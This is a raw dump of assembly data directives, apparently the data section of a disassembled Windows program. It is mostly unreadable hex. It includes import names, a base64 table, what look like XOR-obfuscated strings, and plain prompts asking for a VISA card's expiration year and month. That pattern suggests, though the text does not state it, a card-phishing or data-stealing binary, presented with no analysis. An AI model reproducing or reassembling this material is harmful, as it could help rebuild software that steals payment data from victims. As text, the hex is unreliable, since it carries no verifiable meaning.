dd 0D0F7B500h, 0A00C5D0h, 0A377200h, 1A26061Bh, 16131700h
dd 34001700h, 2 dup(57115711h), 11571119h, 11571157h, 1A571157h
dd 595B57h, 0B3960016h, 2 dup(0B3F5B3F5h), 0F5B3BBF5h
dd 0F5B3F5B3h, 0E4B8F5B3h, 100E3h, 100BB98h, 0E4C700h
dd 8EAD0001h, 88000700h, 0F8FCFCE0h, 0A7A7B2h, 8CAF0001h
dd 9B000700h, 0EBEFEFF3h, 0B4B4A1h, 82E1042Bh, 89828489h
dd 93918F84h, 0CF929284h, 8E878F88h, 8D8E86C2h, 8D8E9185h
dd 8E82CF8Dh, 8F88C28Ch, 8D8E8695h, 8E82CF85h, 9696C28Ch
dd 8382CF96h, 9493CF93h, 969696C2h, 828E92CFh, 80CF928Ah
dd 9592C282h, 918C938Eh, 82CF9880h, 82C28C8Eh, 8E959493h
dd 948FCF91h, 96848FC2h, 868684CFh, 8C8E82CFh, 969696C2h
dd 8F8E91CFh, 8292889Bh, 0CF928C80h, 0C28C8E82h, 828D8496h
dd 0D2848C8Eh, 888C92CFh, 82CF848Dh, 8A94CF8Eh, 838D8EC2h
dd 808FCFD3h, 8F8E8895h, 82CF9584h, 96C28C8Eh, 83CF9696h
dd 0CF8F8883h, 8CC29493h, 84959280h, 0CF99CC93h, 0C28C8E82h
dd 0CF969696h, 9B8F8E91h, 80829288h, 82CF928Ch, 96C28C8Eh
dd 83CF9696h, 0CC8A8F80h, 908F8083h, 82CC8494h, 85808F80h
dd 8082CF80h, 969696C2h, 8F8E91CFh, 8292889Bh, 0CF928C80h
dd 0C28C8E82h, 0CF969696h, 0CF8E8C83h, 0C28C8E82h, 91988091h
dd 82CF8D80h, 84C28C8Eh, 0CF988083h, 0C28C8E82h, 0CF969696h
dd 8A8F8083h, 808C878Eh, 80939485h, 8C8E82CFh, 969696C2h
dd 838882CFh, 8E82CF82h, 9696C28Ch, 9597CF96h, 9493CF83h
dd 969696C2h, 839682CFh, 0CF8A8F80h, 0C28C8E82h, 858D8E86h
dd 8D8D8E91h, 8C8E82CFh, 969696C2h, 8F8E91CFh, 8292889Bh
dd 0CF928C80h, 0C28C8E82h, 0CF969696h, 80838C8Ch, 93CF8A8Fh
dd 9696C294h, 8F94CF96h, 95928088h, 0CF8C9493h, 86C29493h
dd 91858D8Eh, 0CF8D8D8Eh, 0C28C8E82h, 0CF969696h, 9B8F8E91h
dd 80829288h, 82CF928Ch, 96C28C8Eh, 96CF9696h, 858D938Eh
dd 8A8F8083h, 86938ECFh, 969696C2h, 8F8082CFh, 80858885h
dd 84978495h, 88878893h, 82CF9384h, 96C28C8Eh, 91CF9696h
dd 889B8F8Eh, 8C808292h, 8E82CF92h, 9696C28Ch, 8083CF96h
dd 878E8A8Fh, 88858F88h, 8E82CF80h, 9696C28Ch, 8288CF96h
dd 8A8F8083h, 0C29493CFh, 8A8F8083h, 0CF868F88h, 888D8089h
dd 0CC998087h, 888D8F8Eh, 82CF848Fh, 8A94CF8Eh, 969696C2h
dd 8F8497CFh, 92938E85h, 848C808Fh, 0C29296CFh, 0CF969696h
dd 0CF838C8Ah, 96C29493h, 8FCF9696h, 808C9584h, 95928886h
dd 82CF9384h, 8AC28C8Eh, 808A9780h, 8F84829Bh, 0CF938495h
dd 0C28C8E82h, 0CF969696h, 858F8497h, 8F92938Eh, 0CF848C80h
dd 8CC29296h, 8D8F8E98h, 80848F88h, 948E8282h, 0D392958Fh
dd 838380CFh, 808F9884h, 8F8E8895h, 82CF8D80h, 8A94CF8Eh
dd 8D8F8EC2h, 0CC848F88h, 88929483h, 9292848Fh, 8E8D8DCFh
dd 95928598h, 82CF8392h, 8A94CF8Eh, 969696C2h, 8D8D80CFh
dd 83808980h, 80838580h, 82CF8A8Fh, 96C28C8Eh, 93CF9696h
dd 82CF8283h, 96C28C8Eh, 91CF9696h, 889B8F8Eh, 8C808292h
dd 8E82CF92h, 9696C28Ch, 89CFD096h, 0CF828392h, 8AC28082h
dd 84938386h, 8299808Dh, 0CF83948Dh, 98C29493h, 8E838C80h
dd 9B8883CFh, 85888AC2h, 83CC928Eh, 0CF8A8F80h, 96C29493h
dd 8DCF9696h, 88858283h, 95828493h, 94808DCFh, 958F8493h
dd 838F8088h, 0CF8A8F80h, 83C28082h, 8D829380h, 0CF929880h
dd 0C28C8E82h, 80958E95h, 87988D8Dh, 83848493h, 888A8F80h
dd 82CF868Fh, 96C28C8Eh, 8FCF9696h, 82CF8283h, 0D2D4C280h
dd 8A8F8083h, 8C8E82CFh, 969696C2h, 8F8497CFh, 92938E85h
dd 848C808Fh, 0C29296CFh, 0CF969696h, 0CC83D383h, 92949395h
dd 8E82CF95h, 9696C28Ch, 8497CF96h, 938E858Fh, 8C808F92h
dd 9296CF84h, 84918EC2h, 8F80838Fh, 8E82CF8Ah, 8095C28Ch
dd 848FCC95h, 80839587h, 93CF8A8Fh, 8492C294h, 83808D82h
dd 0C29493CFh, 94828492h, 98958893h, 0CF83808Dh, 87C29493h
dd 80899584h, 83CF8593h, 86C29B88h, 998F8E93h, 8F808D91h
dd 0CF929584h, 97C29493h, 8E858F84h, 808F9293h, 96CF848Ch
dd 0B00C292h, 0D2E5B700h, 0D8DBF4D0h, 0D2FCD2C4h, 1000CEh
dd 0DFDDEAB8h, 0CADDCDE9h, 0D4D9EEC1h, 0C0FDDDCDh, 0D00F9h
dd 1C1E297Bh, 151E0B34h, 3E021E30h, 0C003A03h, 0F4F19000h
dd 0F9E0F1E6h, 0F4BEA2A3h, 0C00FCFCh, 0DEDBBA00h, 0D3CADBCCh
dd 0DE948889h, 400D6D6h, 0AAECC900h, 0C0095F3h, 0D9F4B000h
dd 0D5F7C0C3h, 0C2D1E0C4h, 0B00DDD1h, 46712700h, 49464E55h
dd 4E496E53h, 0C0053h, 7B685F09h, 7D676860h, 686C654Ah
dd 0D007Bh, 5C567C2Fh, 4A4A5D69h, 465D5B7Ch, 0E004841h
dd 0D0FAA900h, 0C5C5E8DAh, 0DDFACAC6h, 0CEC7C0DBh, 61000C00h
dd 40D0Eh, 53521514h, 0D0D054Fh, 0F5000C00h, 9490999Ah
dd 0C7C68180h, 999991DBh, 0A2001200h, 0CFD7CCE7h, 0C9D1C7E6h
dd 0F5D2CDD6h, 0CDC6CCCBh, 0D00D1D5h, 4E612700h, 4E704349h
dd 50484349h, 665F62h, 2B7F0010h, 0C111E0Dh, 1A0B1E13h
dd 0C0C1A32h, 1A181Eh, 2576000Ah, 2101191Eh, 1912181Fh
dd 0E0001h, 46576132h, 565C5B65h, 5766455Dh, 73464Ah, 590A000Eh
dd 635D7E6Fh, 7D656E64h, 6D646546h, 8004Bh, 54457320h
dd 454D4974h, 80052h, 7162073h, 6101C35h, 0C0000h, 23281E4Dh
dd 3E280029h, 282A2C3Eh, 0E000Ch, 0E7E5D280h, 0E5F4F3E9h
dd 0E1ECC3F2h, 0C1F3F3h, 5C11000Ah, 4674677Eh, 7E757F78h
dd 0B0066h, 0A0B69ED3h, 0B6B4B2A0h, 92ABBC91h, 68000900h
dd 0C090724h, 6070B21h, 0B0029h, 17193A76h, 4033512h, 37041905h
dd 80000E00h, 0D7F4E5C7h, 0EFE4EEE9h, 0F8E5D4F7h, 0D00C1F4h
dd 0A082C500h, 0ABAC92B1h, 97B2AAA1h, 0B1A6A0h, 1552000Eh
dd 3B052637h, 253D363Ch, 353C3D1Eh, 90013h, 0C8D9FBBCh
dd 0D8D2D5EBh, 0B00CBD3h, 0DEFCBB00h, 0C8DEF6CFh, 0DEDCDAC8h
dd 1300FAh, 0ECFDDF98h, 0FDEAF7DEh, 0EDF7EAFFh, 0F1CFFCF6h
dd 0EFF7FCF6h, 0A0000D00h, 0E3D4C5E7h, 0D3D3C1CCh, 0C5CDC1EEh
dd 1000E1h, 140E2367h, 4130617h, 14022A0Fh, 2000614h, 0D0026h
dd 10062763h, 1A0C1117h, 70D0A34h, 0E00140Ch, 4C6D2900h
dd 47407E4Fh, 795E464Dh, 684A465Bh, 87000F00h, 0E6E2F5C4h
dd 0EED0E2F3h, 0F0E8E3E9h, 0C6FFC2h, 0B7F4000Fh, 0A3989895h
dd 9B909A9Dh, 9B86A483h, 0A00B597h, 33354000h, 72733225h
dd 2C2C246Eh, 60000A00h, 12051315h, 44E5253h, 3000C0Ch
dd 0C296AD00h, 40090h, 0BEA2EAD1h, 400ECh, 0C990CFF4h
dd 0DEh, 300h, 4004D00h, 0A000000h, 25000000h, 73255C73h
dd 0E7000400h, 0CDBB94C2h, 4002A00h, 0A8ACA800h, 900A8A8h
dd 2C0E5E00h, 3D2B3A31h, 3A172Ah, 2E7D0029h, 2A293B32h
dd 21382F3Ch, 0F1E1430h, 1B120E12h, 142A2109h, 0A121913h
dd 83E210Eh, 13180F0Fh, 0F182B09h, 1312140Eh, 5B000100h
dd 40075h, 225F577Ah, 30054h, 9CFAA3C0h, 0D5000800h, 0F0FBA0F0h
dd 0A0F0FBA0h, 74000200h, 200203Ah, 45241D00h, 40000B00h
dd 31053309h, 72C2135h, 40915h, 0B48000Eh, 21261D27h, 213C2126h
dd 32212429h
dd 0C002Dh, 0AD8BA7E4h, 8D908D8Ah, 9E8D8885h, 100081h
dd 2E022E6Dh, 190C081Fh, 1E032408h, 0E030C19h, 0F0008h
dd 0A5BAB5F6h, 84B0B2BFh, 82A59B99h, 91989F84h, 0B9000900h
dd 8ADCD5D6h, 0D5DD978Bh, 900D5h, 0ADA4A7C8h, 0ACE6FAFBh
dd 100A4A4h, 84D800h, 900h, 6F000D00h, 6B006800h, 7F006200h
dd 48006800h, 69006300h, 5A000000h, 0F6A39F00h, 0E8BFF8F2h
dd 0F7EBFBF6h, 0F7BFAFA2h, 0F7F8F6FAh, 0BFAFA2EBh, 0FBEDF0FDh
dd 0AFA2EDFAh, 0FCEDECBFh, 0EBEBF7A2h, 0B0B0A5EFh, 0F7A0ECBAh
dd 0B9ECBAA2h, 0EABAA2F6h, 0F0B9ECBAh, 0B9EABAA2h, 0FCBAA2F9h
dd 0A2F6ECB9h, 0ECB9ECBAh, 0EABAA2F0h, 0A2F3EBB9h, 0FBB9EABAh
dd 0A1ECBAA2h, 56002C00h, 313B3F6Ah, 323F2176h, 666B3E22h
dd 3F333E76h, 6B223E31h, 39347666h, 24333224h, 2576666Bh
dd 736B3524h, 30697925h, 6835736Bh, 9E000700h, 0A2A0FCA2h
dd 0A0FCB1h, 91D6000Eh, 0A285A2B3h, 99BDB5B9h, 0B5B3BCB4h
dd 0B00A2h, 35221350h, 16352431h, 11243E3Fh, 0AF000900h
dd 9CC6CBC8h, 0C3CB819Dh, 900C3h, 5C515235h, 511B0706h
dd 6005959h, 38385300h, 2B257E22h, 43000800h, 2E1C3066h
dd 36663B37h, 0A6001200h, 0EFC5C0F5h, 0CACFE0D5h, 0C9D4F6C3h
dd 0D2C5C3D2h, 700C2C3h, 7B6E1D00h, 7179337Eh, 70071h
dd 585D483Bh, 57575F15h, 3C001000h, 597B746Fh, 50537A48h
dd 6C4E5958h, 7D54485Dh, 81000B00h, 0EDE4E9F2h, 0AFB3B2EDh
dd 0EDEDE5h, 6013000Bh, 7F7F767Bh, 773D2120h, 7F7Fh, 6008600h
dd 30374400h, 3D342736h, 0F7000800h, 85878481h, 9183999Eh
dd 6D000700h, 41F1D1Eh, 0B1903h, 0EF9C0006h, 0FDFFEEE8h
dd 500E8h, 978485F6h, 4009298h, 20334100h, 600252Fh, 0EDE58800h
dd 0FCEDFBE5h, 6C000600h, 0F010901h, 600151Ch, 6E660B00h
dd 7B666866h, 35000600h, 59595458h, 400565Ah, 0F7E38500h
dd 400E0E0h, 13066700h, 7000E08h, 0A3B8CC00h, 0A9BCBCB9h
dd 600BEh, 0C133F60h, 100505h, 4F2C000Ah, 4048585Eh, 40480240h
dd 0A0040h, 0F09187Bh, 5517171Fh, 17171Fh, 7D160006h, 603B677Dh
dd 6006Eh, 0ABB1B1DAh, 0A2ACF7h, 8630006h, 154E1208h, 6001Bh
dd 766C6C07h, 7F712Ah, 0E2B0008h, 5F467458h, 5E0E53h, 63696C43h
dd 6E4F206Bh, 54206563h, 6F43206Fh, 6E69746Eh, 42006575h
dd 4F545455h, 1E004Eh, 0DFD7CA8Fh, 0DBCEDDC6h, 0AFC1C0C6h
dd 0CADBCECBh, 0CE858585h, 0DFAFC2DBh, 0CCAFC1C6h, 0CACBC0h
dd 530006h, 1A071207h, 44450010h, 6005449h, 9290A200h
dd 0D7908C87h, 71000400h, 4435F54h, 4F430000h, 424F424Dh
dd 600584Fh, 9C9BC800h, 8B819C89h, 0B6006E00h, 0D4D7D8E3h
dd 0C296D3DAh, 0C3D796D9h, 0C4D9DEC2h, 98D3CCDFh, 96C593BCh
dd 0D5D9C4C6h, 0DFC5C5D3h, 0D596D1D8h, 0D3C2D8D3h, 0C5DF96C4h
dd 0D7D8C396h, 96D3DAD4h, 0D796D9C2h, 0D9DEC2C3h, 0D3CCDFC4h
dd 0C3D9CF96h, 0D7D596C4h, 9396D2C4h, 0FBBC98C5h, 96D3DDD7h
dd 0C4C4D9D5h, 0DFC2D5D3h, 96C5D8D9h, 96D2D8D7h, 96CFC4C2h
dd 0DFD7D1D7h, 0A0098D8h, 6F430E00h, 7C6B7A7Dh, 6A7C6F4Dh
dd 53495600h, 200041h, 54415453h, 4349h, 600AA00h, 64633000h
dd 73796471h, 30001500h, 1010103Ah, 737F6260h, 79636375h
dd 7610777Eh, 757C7971h, 60074h, 0F1E4E3B0h, 0F3F9E4h
dd 2D716B6Bh, 45007876h, 6F6C7078h, 726572h, 0EBAF0009h
dd 0CDE0CCC0h, 0DBCCCAC5h, 0E9000E00h, 0BE8B88BDh, 868D8780h
dd 8885AA9Eh, 4009A9Ah, 2C6C4200h, 100312Eh, 0CA9600h
dd 0C4E1000Fh, 8785BD92h, 9B94C48Dh, 85CFD3D2h, 0F008D8Dh
dd 0F7A18400h, 0A1E2EFD8h, 0B7FEE8F1h, 0E8E0AAB6h, 0E8h
dd 1004Ch, 1000C74h, 3B1B00h, 0A90000h, 1540013h, 3836353Ah
dd 3B207431h, 20213574h, 3D263B3Ch, 3500312Eh, 1E257000h
dd 151C1211h, 501F0450h, 18040511h, 0A19021Fh, 505D5015h
dd 3F333E39h, 33352222h, 39205024h, 20505E3Eh, 311151Ch
dd 13505C15h, 1502021Fh, 5E0413h, 96BB0001h, 656C5000h
dd 2C657361h, 6C657320h, 20746365h, 69707845h, 69746172h
dd 59206E6Fh, 726165h, 69490001h, 656C5000h, 2C657361h
dd 6C657320h, 20746365h, 69707845h, 69746172h, 4D206E6Fh
dd 68746E6Fh, 3E001100h, 5B4A5077h, 4A5B504Ch, 4E467B1Eh
dd 5B4C5152h, 0A004Ch, 0C8CDD8ABh, 85D8C4F4h, 0C7C7CFh
dd 90E3000Ah, 8CBC8085h, 8F87CD90h, 2008Fh, 9090B0h, 0F8D70001h
dd 65001200h, 11061608h, 163A1609h, 10110411h, 17040716h
dd 0E005756h, 76431700h, 797E4075h, 54607873h, 6464767Bh
dd 51000400h, 9637F74h, 9F000100h, 632500BAh, 97000100h
dd 732500CBh, 5C7325h, 91B40003h, 4009EC7h, 0E486D00h
dd 4003157h, 0BAF0DE00h, 400AABFh, 16567800h, 1000B14h
dd 247800h, 0D3FD0004h, 8E9193h, 0A0FC0001h, 69000100h
dd 7C200015h, 12000100h, 40028h, 0AAFAFFDFh, 100E5h, 0A00562Ah
dd 514D6D00h, 203F222Bh, 53184857h, 34000B00h, 66720814h
dd 0E717975h, 0A4111h, 0FDDD000Ah, 9C8F9BE1h, 90E79890h
dd 0E3h, 400h, 0D500BB00h, 0D600DA00h, 0DE00h, 500h, 0EF009900h
dd 0F500F800h, 0FC00EC00h, 4000000h, 0A1E7C200h, 41009EF8h
dd 45444342h, 49484746h, 4D4C4B4Ah, 51504F4Eh, 55545352h
dd 59585756h, 6362615Ah, 67666564h, 6B6A6968h, 6F6E6D6Ch
dd 73727170h, 77767574h, 307A7978h, 34333231h, 38373635h
dd 2F2B39h, 2F2F3Ah, 0A0597200h, 0CFF6A89Bh, 42A411h, 8F0AC9A0h
dd 4106E039h, 0D0399AFEh, 8CA411h, 8F0AC9A0h, 0A715A039h
dd 0D0658734h, 4A9211h, 0ACC7AF20h, 50F25B4Dh, 0CF98B530h
dd 82BB11h, 0CEBD00AAh, 96B2840Bh, 1ABAB4B1h, 9CB610h
dd 1D3400AAh, 2040007h, 0
dd 0C000h, 0
dd 2C442546h, 0D026CB33h, 83B411h, 1D94FC0h, 50F1FF19h
dd 0CF98B530h, 82BB11h, 0CEBD00AAh, 50F21F0Bh, 0CF98B530h
dd 82BB11h, 0CEBD00AAh, 50F1F70Bh, 0CF98B530h, 82BB11h
dd 0CEBD00AAh, 50F2400Bh, 0CF98B530h, 82BB11h, 0CEBD00AAh
dd 2C44270Bh, 0D026CB33h, 83B411h, 1D94FC0h, 0CB690019h
dd 0CF4D9585h, 0C9611h, 0EEF4C780h, 85h, 0
dd 0C000h, 0
dd 0C166146h, 0D0CDAFD3h, 3E8A11h, 0E2C94FC0h, 6Eh, 3Bh dup(0)
dd 1407000h, 2 dup(0)
dd 1418400h, 140AC00h, 1408400h, 2 dup(0)
dd 141A000h, 140C000h, 12h dup(0)
dd 140E800h, 140F800h, 1411400h, 2 dup(0)
dd 1412000h, 1412C00h, 1414000h, 1414C00h, 1415800h, 1416400h
dd 1416C00h, 1417800h, 2 dup(0)
dd 140E800h, 140F800h, 1411400h, 2 dup(0)
dd 1412000h, 1412C00h, 1414000h, 1414C00h, 1415800h, 1416400h
dd 1416C00h, 1417800h, 2 dup(0)
dd 45009B00h, 50746978h, 65636F72h, 7373h, 47012400h, 6E457465h
dd 6F726976h, 6E656D6Eh, 72745374h, 73676E69h, 41h, 52027800h
dd 6E556C74h, 646E6977h, 5F008000h, 706F6466h, 6E65h, 5F014F00h
dd 6E65706Fh, 66736F5Fh, 646E6168h, 656Ch, 66020D00h, 736F6C63h
dd 65h, 5F003900h, 69786563h, 74h, 6D024E00h, 6F6C6C61h
dd 63h, 72026000h, 65736961h, 73026700h, 75627465h, 66h
dd 73027500h, 70637274h, 79h, 52454B00h, 334C454Eh, 6C642E32h
dd 6Ch, 1400000h, 2 dup(1400010h), 54524310h, 2E4C4C44h
dd 4C4C44h, 1401400h, 7 dup(1401410h), 10h, 0Dh dup(0)
dd 2000h, 0
dd 2000h, 100000h, 0BE0000h, 0C00000h, 0F40000h, 78h dup(0)
dd 100000h, 16800h, 8C303100h, 0FD30F330h, 13310530h, 21311931h
dd 0B6312731h, 0FC31EF31h, 0E320131h, 23321332h, 3E322932h
dd 3732B432h, 59334F33h, 6F335E33h, 83337933h, 9A338933h
dd 0B033A033h, 0BD33B633h, 0E133C833h, 0F933EF33h, 20340633h
dd 2D342734h, 45343B34h, 55344B34h, 68345E34h, 7C347134h
dd 89348234h, 9E349034h, 0B634A534h, 0C934BD34h, 1C34FD34h
dd 3B353235h, 49354235h, 8C357535h, 0BC359335h, 0FA35C335h
dd 47364035h, 77367136h, 0A4368B36h, 0CF36AA36h, 0FB36F436h
dd 1D370D36h, 34372937h, 71374337h, 0A8379837h, 0FE37BB37h
dd 44381C37h, 9F387638h, 0CC38B838h, 0F038E938h, 9390238h
dd 3A393339h, 48394239h, 0A0399039h, 0CD39B939h, 0FA39E339h
dd 283A2239h, 643A5D3Ah, 8C3A6B3Ah, 0A23A993Ah, 0E53AB23Ah
dd 1E3B113Ah, 3A3B343Bh, 923B603Bh, 0C43B983Bh, 0DC3BCF3Bh
dd 0A3BEF3Bh, 203C193Ch, 4A3C443Ch, 753C6E3Ch, 0A23C993Ch
dd 0D23CC23Ch, 0F43CEE3Ch, 213D143Ch, 3F3D2B3Dh, 543D463Dh
dd 723D5E3Dh, 873D783Dh, 0BD3D8D3Dh, 0E73DDA3Dh, 43DFB3Dh
dd 243E0F3Eh, 383E2A3Eh, 0BD3E873Eh, 0EC3EC33Eh, 93F033Eh
dd 403F303Fh, 5A3F463Fh, 0B63F603Fh, 0ED3FD43Fh, 20003Fh
dd 18800h, 0B300400h, 43303D30h, 7E304A30h, 8A308330h
dd 0C8309A30h, 0EE30E730h, 0FC30F630h, 43313E30h, 70315C31h
dd 89318431h, 0B0319C31h, 14320831h, 35322132h, 4D323A32h
dd 9A328D32h, 0E932A632h, 1732EF32h, 46331E33h, 6D335833h
dd 9F337433h, 0BB33A433h, 0FF33E433h, 30340533h, 58345234h
dd 734F634h, 2E351A35h, 46353335h, 5F355235h, 81357535h
dd 0A0358D35h, 0BE35B035h, 0D235CB35h, 0E835E235h, 0FB35F535h
dd 33362235h, 5A364636h, 72365F36h, 86367D36h, 0A5368D36h
dd 0DC36CF36h, 136E136h, 36370737h, 64375D37h, 81377437h
dd 93378C37h, 0CE37BE37h, 0F737DE37h, 1A380A37h, 31382A38h
dd 50384238h, 82386A38h, 0AC389A38h, 0C038B838h, 0D938D338h
dd 1138DF38h, 37393139h, 97397939h, 3639F839h, 6E3A553Ah
dd 873A803Ah, 0D13AB23Ah, 0DC3AD73Ah, 103B013Ah, 413B223Bh
dd 653B583Bh, 0C63BBC3Bh, 3E3C333Bh, 623C453Ch, 953C683Ch
dd 0F33CEC3Ch, 73D013Ch, 1E3D183Dh, 8A3D623Dh, 0AC3DA63Dh
dd 0D63DCE3Dh, 0E43DDD3Dh, 0F53DEE3Dh, 93DFB3Dh, 283E213Eh
dd 463E3D3Eh, 603E4C3Eh, 763E6C3Eh, 843E7C3Eh, 913E8B3Eh
dd 9E3E993Eh, 0CE3EB93Eh, 0F33EE13Eh, 293F063Eh, 443F353Fh
dd 723F603Fh, 0A53F913Fh, 0B83FAC3Fh, 0C63FC13Fh, 0D63FCC3Fh
dd 0E93FDB3Fh, 3FFF3Fh, 300000h, 1E800h, 1B300F00h, 36302130h
dd 62304A30h, 8D306930h, 0BA309F30h, 0E730CC30h, 1F30F930h
dd 47312431h, 76315931h, 8F317D31h, 0B031AA31h, 0ED31C231h
dd 1931F431h, 4B322632h, 65325D32h, 8A327D32h, 0BB32B532h
dd 0D032C432h, 0F932DA32h, 13330032h, 31331E33h, 0A833A133h
dd 0C333B633h, 0D533CF33h, 0E933E333h, 533F733h, 22341934h
dd 37343034h, 52344734h, 65345934h, 0A3346C34h, 0CF34C534h
dd 0E634D934h, 34EB34h, 31350E35h, 53354535h, 7C356535h
dd 90358135h, 0AA35A335h, 0C235BB35h, 0F435E835h, 7360035h
dd 32362336h, 47364036h, 6E365636h, 84367936h, 94368D36h
dd 0A936A236h, 0DB36C436h, 0F436E436h, 0FE36F936h, 0D370736h
dd 1B371437h, 40373137h, 5E374C37h, 94376437h, 0A837A137h
dd 0D437BE37h, 0EA37DB37h, 1237FC37h, 2B381938h, 87387538h
dd 0AF38A638h, 0CD38C138h, 0E538D938h, 0F738F238h, 0D390038h
dd 18391239h, 27392039h, 36393039h, 62393B39h, 73396739h
dd 9A398D39h, 0C139BB39h, 0D739C639h, 0E839DF39h, 239FC39h
dd 2B3A243Ah, 593A4C3Ah, 9D3A8D3Ah, 0AE3AA73Ah, 0C23AB43Ah
dd 0E13AD43Ah, 0FB3AF53Ah, 153B083Ah, 353B273Bh, 4E3B433Bh
dd 633B573Bh, 6E3B683Bh, 0D43BB73Bh, 4C3C353Bh, 683C623Ch
dd 973C813Ch, 0AA3C9D3Ch, 0C43CB03Ch, 0E83CCB3Ch, 13CF33Ch
dd 323D2C3Dh, 3E3D373Dh, 533D4D3Dh, 773D593Dh, 0A03D9A3Dh
dd 0AD3DA73Dh, 0C73DBB3Dh, 0DB3DCE3Dh, 0F73DE33Dh, 73DFD3Dh
dd 2E3E1A3Eh, 573E513Eh, 6B3E5C3Eh, 803E723Eh, 943E8C3Eh
dd 0AE3EA83Eh, 0CB3EB83Eh, 23EDF3Eh, 0D3F083Fh, 213F133Fh
dd 4D3F283Fh, 663F543Fh, 0BB3F6C3Fh, 40003Fh, 22000h, 35302F00h
dd 7A306C30h, 8F307F30h, 0A1309B30h, 0BA30B530h, 0DF30D930h
dd 0F930F330h, 16310330h, 3E312A31h, 51314431h, 70316A31h
dd 8C318431h, 0AD319431h, 0CE31C831h, 0FF31E431h, 18320531h
dd 39323332h, 67324C32h, 75326D32h, 0C132B532h, 0D332CB32h
dd 0E330532h, 24331A33h, 32332B33h, 51334033h, 7E335833h
dd 0A9338533h, 0C033BA33h, 0DF33D333h, 0F533EC33h, 12340433h
dd 2B341D34h, 4D344034h, 6D346634h, 97347A34h, 0BF349D34h
dd 0EE34E434h, 0FD34F734h, 42351434h, 59354835h, 6A356335h
dd 7C357435h, 9A359435h, 0D435C735h, 0F735DD35h, 2A360535h
dd 54363536h, 97369136h, 1936D236h, 3A371F37h, 81374137h
dd 9A379437h, 0B637AF37h, 0D537CB37h, 0FF37EC37h, 26380937h
dd 59382C38h, 8D385F38h, 9F389338h, 0C538B238h, 0ED38D938h
dd 0F838F338h, 0B390538h, 1D391039h, 28392339h, 3B393539h
dd 7F394039h, 90398439h, 0AA399739h, 0B539B039h, 0D239C139h
dd 0DE39D839h, 0E939E339h, 0F439EE39h, 0FE39F939h, 113A0A39h
dd 263A1B3Ah, 313A2B3Ah, 3C3A363Ah, 473A413Ah, 523A4C3Ah
dd 653A573Ah, 753A703Ah, 883A813Ah, 9F3A943Ah, 0B23AA63Ah
dd 0BE3AB93Ah, 0CB3AC63Ah, 0E93AE33Ah, 83B013Ah, 323B2B3Bh
dd 413B3C3Bh, 563B503Bh, 793B6D3Bh, 8D3B863Bh, 0AC3B973Bh
dd 0CC3BB33Bh, 0EC3BD33Bh, 393BF33Bh, 563C503Ch, 763C683Ch
dd 0A13C9A3Ch, 0C73CBE3Ch, 0D43CCD3Ch, 0E23CDA3Ch, 0EF3CE73Ch
dd 53CF93Ch, 1D3D0B3Dh, 3B3D353Dh, 523D4A3Dh, 713D613Dh
dd 8B3D783Dh, 0B43DA53Dh, 0CB3DBA3Dh, 0DB3DD23Dh, 0EB3DE23Dh
dd 0E3DF63Dh, 253E163Eh, 413E323Eh, 613E5B3Eh, 763E673Eh
dd 0A73E913Eh, 0C53EB23Eh, 0D63ED03Eh, 83EF63Eh, 203F0F3Fh
dd 443F3C3Fh, 503F4A3Fh, 613F5A3Fh, 953F893Fh, 0A23F9B3Fh
dd 0D73FD13Fh, 0EE3FE13Fh, 3FF63Fh, 500000h, 22C00h, 7300100h
dd 3D302C30h, 64305030h, 7C306930h, 8A308430h, 0AD30A630h
dd 0D730C530h, 0F030E930h, 9310230h, 1D311731h, 35312831h
dd 4E313E31h, 63315C31h, 7E317531h, 9B318D31h, 0B131A231h
dd 0CA31C131h, 0DB31D531h, 0F631E631h, 8320231h, 1D321332h
dd 35322932h, 47323E32h, 5A325332h, 6D326732h, 81327832h
dd 9D328C32h, 0A832A332h, 0F532EF32h, 13330332h, 3D331B33h
dd 53334933h, 67335E33h, 0B533AE33h, 0CE33C833h, 0F433E233h
dd 0C340633h, 34342034h, 4C343A34h, 6C345634h, 84347234h
dd 9F349634h, 0BB34B134h, 0E134CF34h, 0FF34EB34h, 1A350634h
dd 34352E35h, 61353F35h, 87357D35h, 0A0359235h, 0C135A735h
dd 0EA35DC35h, 0FC35F035h, 10360335h, 38361736h, 4B364436h
dd 80366836h, 96368E36h, 0A836A036h, 0CA36C136h, 36D836h
dd 19370537h, 4D373137h, 8E377837h
dd 0A7379437h, 0E137AF37h, 0F037E737h, 10380537h, 45383238h
dd 71385438h, 8A387838h, 0B638A638h, 0F138C638h, 0F38F838h
dd 32392C39h, 47393C39h, 85395739h, 0A4398B39h, 0B839AE39h
dd 0CA39BE39h, 0F039D439h, 339F739h, 253A1A3Ah, 3F3A2D3Ah
dd 503A4A3Ah, 663A5B3Ah, 873A703Ah, 0A73A9C3Ah, 0C13ABA3Ah
dd 0D43ACE3Ah, 0E73ADB3Ah, 0F13AEC3Ah, 1D3AFB3Ah, 283B223Bh
dd 4A3B373Bh, 833B623Bh, 0B63B883Bh, 0C53BBC3Bh, 0DE3BD23Bh
dd 23BFB3Bh, 273C0E3Ch, 383C2D3Ch, 493C423Ch, 673C5A3Ch
dd 793C6E3Ch, 0B43C903Ch, 0C63CBA3Ch, 0D63CCD3Ch, 0E83CDD3Ch
dd 0FB3CF63Ch, 73D013Ch, 1E3D113Dh, 483D423Dh, 5C3D543Dh
dd 713D663Dh, 843D7F3Dh, 923D8A3Dh, 0A43D9F3Dh, 0BE3DAA3Dh
dd 0E53DD93Dh, 83E023Dh, 1F3E0D3Eh, 373E263Eh, 653E483Eh
dd 7F3E6B3Eh, 0B43E883Eh, 0C23EBB3Eh, 0DA3ECE3Eh, 0F13EEC3Eh
dd 93EFC3Eh, 143F0E3Fh, 393F333Fh, 4E3F3E3Fh, 833F7C3Fh
dd 9E3F933Fh, 0C63FA43Fh, 0E73FD03Fh, 60003Fh, 22C00h
dd 12300B00h, 29301C30h, 3E303230h, 50304430h, 64305930h
dd 6F306930h, 82307530h, 0A630A030h, 0C830C230h, 0DA30D530h
dd 0F630F030h, 18311230h, 2A312531h, 46314031h, 68316231h
dd 7A317531h, 96319031h, 0B831B231h, 0CA31C531h, 0E631E031h
dd 31FA31h, 1F321532h, 30322732h, 57323832h, 7C326332h
dd 0AC329332h, 0CB32C232h, 0F232D832h, 432FD32h, 1F331833h
dd 74336D33h, 8D338233h, 0A4339833h, 0B733AE33h, 0CF33BF33h
dd 0E033DA33h, 0A33F933h, 19341234h, 3A342A34h, 59344A34h
dd 6F346834h, 83347C34h, 9A349534h, 0BD34AA34h, 0D434C534h
dd 0F534DE34h, 534FB34h, 25350A35h, 41353035h, 51354C35h
dd 63355735h, 80356A35h, 91358A35h, 0AA359A35h, 0D835C835h
